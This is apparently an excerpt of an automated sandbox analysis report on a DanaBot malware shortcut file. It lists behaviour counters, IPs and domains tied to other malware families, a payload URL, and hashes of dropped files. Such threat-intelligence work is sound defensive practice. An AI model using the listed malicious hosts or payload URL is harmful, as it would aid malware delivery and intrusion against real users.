                                                              • Excluded IPs from analysis (whitelisted): 23.218.208.109, 199.232.214.172, 23.218.208.137, 50.16.47.176, 54.224.241.105, 34.237.241.83, 18.213.11.84, 172.64.41.3, 162.159.61.3, 23.195.39.65, 2.19.198.75, 23.32.238.130, 184.30.20.134, 23.32.238.163, 23.32.238.147, 23.32.238.137, 23.32.238.128, 23.32.238.89, 13.107.246.63, 52.149.20.212
                                                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
• Execution Graph export aborted for target mshta.exe, PID 6404 because there are no executed functions
                                                              • Execution Graph export aborted for target powershell.exe, PID 5408 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7432 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
03:05:09  API Interceptor  2x Sleep call for process: svchost.exe modified
03:05:16  API Interceptor  159x Sleep call for process: powershell.exe modified
04:08:06  API Interceptor  2x Sleep call for process: AcroCEF.exe modified
04:08:11  API Interceptor  1x Sleep call for process: WMIC.exe modified
04:08:51  API Interceptor  1074137x Sleep call for process: mama.exe modified
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              188.132.183.159vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                206.206.125.221vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                  94.131.118.216vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                    150.241.97.10qx34JU8utj.lnkGet hashmaliciousUnknownBrowse
                                                                    • 150.241.97.10/aa.mp4
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    pravo-bashkortostan.ruvreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                    • 150.241.97.10
                                                                    bg.microsoft.map.fastly.netvreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                    • 199.232.210.172
                                                                    54861 Proforma Invoice AMC2273745.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 199.232.214.172
                                                                    6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
                                                                    • 199.232.214.172
                                                                    C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                    • 199.232.210.172
                                                                    P9UXlizXVS.exeGet hashmaliciousAsyncRATBrowse
                                                                    • 199.232.214.172
                                                                    Setup64v4.1.9.exeGet hashmaliciousUnknownBrowse
                                                                    • 199.232.214.172
                                                                    0Ty.png.exeGet hashmaliciousXmrigBrowse
                                                                    • 199.232.214.172
                                                                    0442.pdf.exeGet hashmaliciousUnknownBrowse
                                                                    • 199.232.210.172
                                                                    0442.pdf.exeGet hashmaliciousUnknownBrowse
                                                                    • 199.232.214.172
                                                                    yvaKqhmD4L.exeGet hashmaliciousUnknownBrowse
                                                                    • 199.232.210.172
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    NASSIST-ASGIvreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                    • 94.131.118.216
                                                                    https://reddsuth.outfitsrl.it/?46525SU=4TI90K00DGet hashmaliciousUnknownBrowse
                                                                    • 94.131.117.116
                                                                    tmpzNIZ0YQ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                    • 95.164.16.15
                                                                    H36NgltNe7.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                    • 95.164.16.15
                                                                    lat0Kwfbuj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                    • 95.164.16.15
                                                                    Josho.m68k.elfGet hashmaliciousUnknownBrowse
                                                                    • 95.164.4.65
                                                                    J5uGzpvcAa.elfGet hashmaliciousUnknownBrowse
                                                                    • 95.164.4.65
  | nPRmTlXhOT.elf | malicious | Unknown | 95.164.4.65
  | OwBugJ5CiC.elf | malicious | Unknown | 95.164.4.65
  | H5LPetzgXV.elf | malicious | Unknown | 95.164.4.65
HYPEENT-SJUS | vreFmptfUu.lnk | malicious | DanaBot | 206.206.125.221
  | YvITZPUmfd.ps1 | malicious | Unknown | 206.206.127.152
  | K05MQ5BcC8.lnk | malicious | Ducktail | 206.206.126.252
  | eQwUFcwrXk.lnk | malicious | Ducktail | 206.206.126.252
  | 4YgQ2xN41W.lnk | malicious | RDPWrap Tool, Ducktail | 206.206.126.252
  | EERNI7eIS7.lnk | malicious | Ducktail | 206.206.126.252
  | cOOhDuNWt7.lnk | malicious | Ducktail | 206.206.126.252
  | O5PR3i6ILA.lnk | malicious | Ducktail | 206.206.126.252
  | SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnk | malicious | Ducktail | 206.206.126.252
  | gW6FHWNFzR.lnk | malicious | Ducktail | 206.206.126.252
PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR | vreFmptfUu.lnk | malicious | DanaBot | 188.132.183.159
  | arm7.nn.elf | malicious | Mirai, Okiru | 78.135.74.199
  | sparc.nn.elf | malicious | Mirai, Okiru | 78.135.115.141
  | PO_63738373663838____________________________________________________________________________.exe | malicious | Snake Keylogger | 188.132.193.46
  | File07098.PDF.exe | malicious | Snake Keylogger | 188.132.193.46
  | Scan_20241030.vbs | malicious | FormBook, GuLoader | 46.28.239.165
  | dekont_001.pdf.exe | malicious | Snake Keylogger | 188.132.193.46
  | nabm68k.elf | malicious | Unknown | 188.132.241.224
  | dekont_001.pdf.exe | malicious | Snake Keylogger | 188.132.193.46
  | PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe | malicious | DarkCloud | 188.132.193.46
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | vreFmptfUu.lnk | malicious | DanaBot | 150.241.97.10
  | skript.bat | malicious | Vidar | 150.241.97.10
  | msgde.exe | malicious | Quasar | 150.241.97.10
  | 6ee7HCp9cD.exe | malicious | Quasar | 150.241.97.10
  | https://www.gglusa.us/ | malicious | Unknown | 150.241.97.10
  | ERTL09tA59.exe | malicious | LummaC | 150.241.97.10
  | GtEVo1eO2p.exe | malicious | LummaC | 150.241.97.10
  | TTsfmr1RWm.exe | malicious | LummaC | 150.241.97.10
  | Dotc67890990.exe | malicious | Snake Keylogger | 150.241.97.10
51c64c77e60f3980eea90869b68c58a8 | EQ5Vcf19u8.exe | malicious | Socks5Systemz | 150.241.97.10
  | EQ5Vcf19u8.exe | malicious | Socks5Systemz | 150.241.97.10
  | vwZcJ81cpN.exe | malicious | Socks5Systemz | 150.241.97.10
  | vwZcJ81cpN.exe | malicious | Socks5Systemz | 150.241.97.10
  | r4xiHKy8aM.exe | malicious | Socks5Systemz | 150.241.97.10
  | gjEtERlBSv.exe | malicious | Socks5Systemz | 150.241.97.10
  | gjEtERlBSv.exe | malicious | Socks5Systemz | 150.241.97.10
  | WindowsUpdate.exe | malicious | Unknown | 150.241.97.10
  | Hbq580QZAR.exe | malicious | Socks5Systemz | 150.241.97.10
  | steel.exe.2.exe | malicious | Socks5Systemz | 150.241.97.10
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Roaming\mama.exe | vreFmptfUu.lnk | malicious | DanaBot |
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.7067065909540811
                                                                      Encrypted:false
                                                                      SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqh:2JIB/wUKUKQncEmYRTwh0d
                                                                      MD5:9510B2A0E6DA17C44866DFB7C4DD46CB
                                                                      SHA1:D06B690EFF108193694101401437AE3CD0BB29A8
                                                                      SHA-256:3C842C934FE0260A5373684B77F0A3BCCD6466C83685FEC235E523C12E5234F7
                                                                      SHA-512:EF9AF8B0533613F1F874D7AF2443A475B80D765AC0687DA2CF77AAD0D874D2717E5973408A7ED1A4907E8B9A064FA66F36F267643B02FDA09EE0601526DA91A5
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x122c8b73, page size 16384, DirtyShutdown, Windows version 10.0
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.7900102357128433
                                                                      Encrypted:false
                                                                      SSDEEP:1536:LSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:LazaPvgurTd42UgSii
                                                                      MD5:AD9E2C7B3B37F2243947C944347968C8
                                                                      SHA1:58105C591179919DB2A4B9CFABC28B893109C0F8
                                                                      SHA-256:46B4162CD0FC948B0694E8F1557D3E8E285FC84F59A90A21BE8FBEB21855D4BE
                                                                      SHA-512:A9CA9E5BDAD59C7F3F4DA3634361FBF6ADCC96F29B6C606E1458F1597FE20C0870C7A753CAEC4AC871A440BB5EB009C26F9D62BE2327B2E449E2C4B7B596C06E
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:zlib compressed data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):0.08182645516831169
                                                                      Encrypted:false
                                                                      SSDEEP:3:2m1KYeboe+pkqNt/57Dek3Jm3BtWApwllEqW3l/TjzzQ/t:B1Kzbz+pkqPR3tmlpQmd8/
                                                                      MD5:F82C1F9F4B80A3EAD1DA87D880ECF6FB
                                                                      SHA1:26A4D953EEF34649B7A392DB68D58DC026941142
                                                                      SHA-256:1EBD8B62A830E994A8E71C540D410291A4DDEB1DE9B389BD6E1D033C5A6AAA0B
                                                                      SHA-512:992D206EF874D67C130AD305FC8A3F9191319124AA52ED88217BDFCDB97384DEE6000F0F8E6D85E9D6D99A6E58A8D48010D0D689043583811B4A97F6B3949CEC
                                                                      Malicious:false
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):300
                                                                      Entropy (8bit):5.267969556343983
                                                                      Encrypted:false
                                                                      SSDEEP:6:2AoQL+q2PcNwi2nKuAl9OmbnIFUt85GjG1Zmw+5XQQLVkwOcNwi2nKuAl9OmbjLJ:2GyvLZHAahFUt85G8/+51R54ZHAaSJ
                                                                      MD5:983858D1D5689AE728F0BEBB97CE299E
                                                                      SHA1:511294B80BCB3DAD659B5DCAD3D1C960D66CBE5C
                                                                      SHA-256:78D855CE7ECA78F6B53B564F94D23AE08E7EC584585CE9AF91B329241B62F7C8
                                                                      SHA-512:FF2D1BE30EA82B2AE6E9EE679824B9A6FCCA9C6F8830A40BE05D4B61188EEE671ACCB7A0F359ACCFA90513043B1676D3FFE392CCBE884819D36C4987C3D3FF64
                                                                      Malicious:false
                                                                      Preview:2024/12/27-04:07:55.516 1d18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/27-04:07:55.579 1d18 Recovering log #3.2024/12/27-04:07:55.580 1d18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):300
                                                                      Entropy (8bit):5.267969556343983
                                                                      Encrypted:false
                                                                      SSDEEP:6:2AoQL+q2PcNwi2nKuAl9OmbnIFUt85GjG1Zmw+5XQQLVkwOcNwi2nKuAl9OmbjLJ:2GyvLZHAahFUt85G8/+51R54ZHAaSJ
                                                                      MD5:983858D1D5689AE728F0BEBB97CE299E
                                                                      SHA1:511294B80BCB3DAD659B5DCAD3D1C960D66CBE5C
                                                                      SHA-256:78D855CE7ECA78F6B53B564F94D23AE08E7EC584585CE9AF91B329241B62F7C8
                                                                      SHA-512:FF2D1BE30EA82B2AE6E9EE679824B9A6FCCA9C6F8830A40BE05D4B61188EEE671ACCB7A0F359ACCFA90513043B1676D3FFE392CCBE884819D36C4987C3D3FF64
                                                                      Malicious:false
                                                                      Preview:2024/12/27-04:07:55.516 1d18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/27-04:07:55.579 1d18 Recovering log #3.2024/12/27-04:07:55.580 1d18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):344
                                                                      Entropy (8bit):5.209567376064612
                                                                      Encrypted:false
                                                                      SSDEEP:6:2I9Iq2PcNwi2nKuAl9Ombzo2jMGIFUt85I0Zmw+5I/7zkwOcNwi2nKuAl9Ombzos:2lvLZHAa8uFUt85L/+5S54ZHAa8RJ
                                                                      MD5:7BE7F9F84CC6C9E56610098364E1077D
                                                                      SHA1:2CA5A647ADC1FBBF7F0696517B626FD091230008
                                                                      SHA-256:E1BF7EEC3089E428F2BEBB22D816CFC7B21079E9D92871140C3E945C04E9FADB
                                                                      SHA-512:548EE13CEE250D8EE6EE88FA27169D37AAC8410F3FA229CD4BA12D6B4DAB5CF07A8ECD0A5C2F81C9DA715CC99AF5BCE58B129E1ACB8368E063F8C815146BAE13
                                                                      Malicious:false
                                                                      Preview:2024/12/27-04:07:55.590 1e60 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/27-04:07:55.591 1e60 Recovering log #3.2024/12/27-04:07:55.592 1e60 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):344
                                                                      Entropy (8bit):5.209567376064612
                                                                      Encrypted:false
                                                                      SSDEEP:6:2I9Iq2PcNwi2nKuAl9Ombzo2jMGIFUt85I0Zmw+5I/7zkwOcNwi2nKuAl9Ombzos:2lvLZHAa8uFUt85L/+5S54ZHAa8RJ
                                                                      MD5:7BE7F9F84CC6C9E56610098364E1077D
                                                                      SHA1:2CA5A647ADC1FBBF7F0696517B626FD091230008
                                                                      SHA-256:E1BF7EEC3089E428F2BEBB22D816CFC7B21079E9D92871140C3E945C04E9FADB
                                                                      SHA-512:548EE13CEE250D8EE6EE88FA27169D37AAC8410F3FA229CD4BA12D6B4DAB5CF07A8ECD0A5C2F81C9DA715CC99AF5BCE58B129E1ACB8368E063F8C815146BAE13
                                                                      Malicious:false
                                                                      Preview:2024/12/27-04:07:55.590 1e60 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/27-04:07:55.591 1e60 Recovering log #3.2024/12/27-04:07:55.592 1e60 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:JSON data
                                                                      Category:modified
                                                                      Size (bytes):475
                                                                      Entropy (8bit):4.972695042269218
                                                                      Encrypted:false
                                                                      SSDEEP:12:YH/um3RA8sqZsBdOg2Hngcaq3QYiubSpDyP7E4TX:Y2sRdsHdMHnL3QYhbSpDa7n7
                                                                      MD5:E963F2FB6304EE0D49E87CE8230F2884
                                                                      SHA1:2B51331B6CEF5B379EF0E723BE7D8839B9C93E1A
                                                                      SHA-256:9471015BB216F99E53C7236A1059D500A645222CF01A9B3D6C60BFB6D18E21AA
                                                                      SHA-512:6C87608726EC1E8839739153E8381FF52C8B72C18381D212CF31C60295C725C448A9607B301783BF775FE505F4AEDC785D554F2CCEA8C73C55B4E8DDFB2D13AA
                                                                      Malicious:false
                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379850483972398","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":642776},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):475
                                                                      Entropy (8bit):4.972695042269218
                                                                      Encrypted:false
                                                                      SSDEEP:12:YH/um3RA8sqZsBdOg2Hngcaq3QYiubSpDyP7E4TX:Y2sRdsHdMHnL3QYhbSpDa7n7
                                                                      MD5:E963F2FB6304EE0D49E87CE8230F2884
                                                                      SHA1:2B51331B6CEF5B379EF0E723BE7D8839B9C93E1A
                                                                      SHA-256:9471015BB216F99E53C7236A1059D500A645222CF01A9B3D6C60BFB6D18E21AA
                                                                      SHA-512:6C87608726EC1E8839739153E8381FF52C8B72C18381D212CF31C60295C725C448A9607B301783BF775FE505F4AEDC785D554F2CCEA8C73C55B4E8DDFB2D13AA
                                                                      Malicious:false
                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379850483972398","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":642776},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):4099
                                                                      Entropy (8bit):5.235580597374808
                                                                      Encrypted:false
                                                                      SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPRKJp:CwNw1GHqPySfkcigoO3h28ytPRKJp
                                                                      MD5:E3383A88E0639EDC48E101931430800B
                                                                      SHA1:6DA88DD1A8CE4D1F6A650545050A9AC278B7DACD
                                                                      SHA-256:81CBBC708BF5F8B83419543D9A0E61F7DE10394319EE3BA4D9265B04959F8D68
                                                                      SHA-512:F6DE12E5F0CD50D1C1286DAFDDBBE05553F14AB39937C830FCA994F65FF421C8AE08818288BA8200671B60DF137A3BC77A21E3BF76CDE953E76AB08B551F9659
                                                                      Malicious:false
                                                                      Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):332
                                                                      Entropy (8bit):5.196330849964765
                                                                      Encrypted:false
                                                                      SSDEEP:6:2gUq2PcNwi2nKuAl9OmbzNMxIFUt85szZmw+5PWzkwOcNwi2nKuAl9OmbzNMFLJ:2fvLZHAa8jFUt85Y/+5ez54ZHAa84J
                                                                      MD5:D4C4BFD4EDDE9FAC296ECE575CEF0324
                                                                      SHA1:07666C9502411A113FD78F29E90DFB7BE7C6B94D
                                                                      SHA-256:FA29C86066F2CDBE4FB4BFA014F39BE287D09886F0A1100D17BF287CB5FEEA44
                                                                      SHA-512:76BCCF296973C21D955D119976726D487AD7115329222637DB3C2BE2C10A6C9082B67657CBE4F12BC99141BE1A2DFEE2CF289CF7FF74CD30E33487F843414A90
                                                                      Malicious:false
                                                                      Preview:2024/12/27-04:07:56.061 1e60 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/27-04:07:56.074 1e60 Recovering log #3.2024/12/27-04:07:56.087 1e60 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):332
                                                                      Entropy (8bit):5.196330849964765
                                                                      Encrypted:false
                                                                      SSDEEP:6:2gUq2PcNwi2nKuAl9OmbzNMxIFUt85szZmw+5PWzkwOcNwi2nKuAl9OmbzNMFLJ:2fvLZHAa8jFUt85Y/+5ez54ZHAa84J
                                                                      MD5:D4C4BFD4EDDE9FAC296ECE575CEF0324
                                                                      SHA1:07666C9502411A113FD78F29E90DFB7BE7C6B94D
                                                                      SHA-256:FA29C86066F2CDBE4FB4BFA014F39BE287D09886F0A1100D17BF287CB5FEEA44
                                                                      SHA-512:76BCCF296973C21D955D119976726D487AD7115329222637DB3C2BE2C10A6C9082B67657CBE4F12BC99141BE1A2DFEE2CF289CF7FF74CD30E33487F843414A90
                                                                      Malicious:false
                                                                      Preview:2024/12/27-04:07:56.061 1e60 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/27-04:07:56.074 1e60 Recovering log #3.2024/12/27-04:07:56.087 1e60 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
Category:dropped
Size (bytes):65110
Entropy (8bit):2.149800531192087
Encrypted:false
SSDEEP:192:arW/0KCorycSBECzu9HLdFQqCoVsjfj5KfXKgyQQ0VTFRH0a:ar0vogCzu9HpFQq7S0NyQQ0ZH0a
MD5:8E76B48B815EF88812C96CC62A3D7390
SHA1:CF45768B64E9D83D7892D02ECFA90B17C03AD626
SHA-256:0ECA97B3D5B789FEA64A38D8966BBA31C8C8C43487F352D2C02AB9F61F9EB54B
SHA-512:84F114F38F8F5F90DC86BADDAD9FAE1724EADF6A05C2B3CCD65D2918C068FC56A138D333348B55D7A69F935999758475B9D41A4DA860A1DAAAA4CA37534E9A40
Malicious:false

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
Category:dropped
Size (bytes):86016
Entropy (8bit):4.438800794702761
Encrypted:false
SSDEEP:384:yeaci5GCiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1yurVgazUpUTTGt
MD5:BC0363B10B41B058B1831C25EC826314
SHA1:134C90632A1026CBB7E872CACE413B4795C308AA
SHA-256:BF4401B12F914C1E9FA513E8AD6CE91836BA7AEAFE1C3F386AA17935613BCB6A
SHA-512:D6F1FCC7E547DE7358C2FCB4A02EC82A8FDD85EDC5F5D46CD2EB89B17D9AFC04BFEC04A6E88642597BD3821F68A9BB55D045CCB21F015C1608C7F5D3752552EF
Malicious:false

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:SQLite Rollback Journal
Category:dropped
Size (bytes):8720
Entropy (8bit):3.7742811034714814
Encrypted:false
SSDEEP:48:7MWp/E2ioyVDQioy3DoWoy1CABoy14TKOioy1noy1AYoy1Wioy1hioybioyGloy+:7NpjuDQ0iA8ZXKQH34b9IVXEBodRBkT
MD5:EB3A13BACDB409E3E08DF1D189237DC3
SHA1:0149D4E36654E2B6FDAC7123B229ADCAB9074C8A
SHA-256:B7A46908A533064F720DDD284A1735FBE6FF2372E10CAAAD41B98742D131B937
SHA-512:678C1ABBDB902D3610270FADEF024270E1AF88490E281947920864963C17CD695E641D5CEEC94E6BCDCF9B97564872E39DA12967F097DC72BAB808CA5CC49D38
Malicious:false

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:Certificate, Version=3
Category:dropped
Size (bytes):1391
Entropy (8bit):7.705940075877404
Encrypted:false
SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:false

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:dropped
Size (bytes):71954
Entropy (8bit):7.996617769952133
Encrypted:true
SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:false

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:data
Category:dropped
Size (bytes):192
Entropy (8bit):2.746484906506307
Encrypted:false
SSDEEP:3:kkFkljS2MlltfllXlE/HT8kg+lz1NNX8RolJuRdxLlGB9lQRYwpDdt:kK52MlleT8Qlz7NMa8RdWBwRd
MD5:5C9EBD26F11837A1782F0C061EC6667E
SHA1:271195884B39231AFCD2B6897BD11351B93F729B
SHA-256:FBA3D2DB4DAF1AB8115BE62B5C6BEBC03D0AF43CED41378D5BA36893A826F566
SHA-512:4907A3E734414CF6B255A2A0653B8B4C89D5418DC4A697C0E48F5F4B4839C3BBFC7E7AC1702228A0450242E84AB05CA74BBEA1DEC193D45B76DFA2C807DB4B2F
Malicious:false
Preview:p...... ..........g.>X..(....................................................... ..........W....E...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:data
Category:modified
Size (bytes):328
Entropy (8bit):3.2418003062782916
Encrypted:false
SSDEEP:6:kKPMllL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:saDImsLNkPlE99SNxAhUe/3
MD5:75476081134FB0957FB8BD9B7DFCF4F4
SHA1:73A18D52EF840F85B95EFF0BF1E70FEFA5D6675A
SHA-256:3348F7C22F963C504A164D0924B206B3BDAB6048FF037AF051AB6003BD8E4E9E
SHA-512:F06C88D32C86D26ED9BC841A3CF6ACCAF7635FBBC9EB89BBD4B30855033DF08488869CADA4C07AE9193A0FD0F96DCCABAE44871370A5D6DF6BB782E0862C4D56
Malicious:false
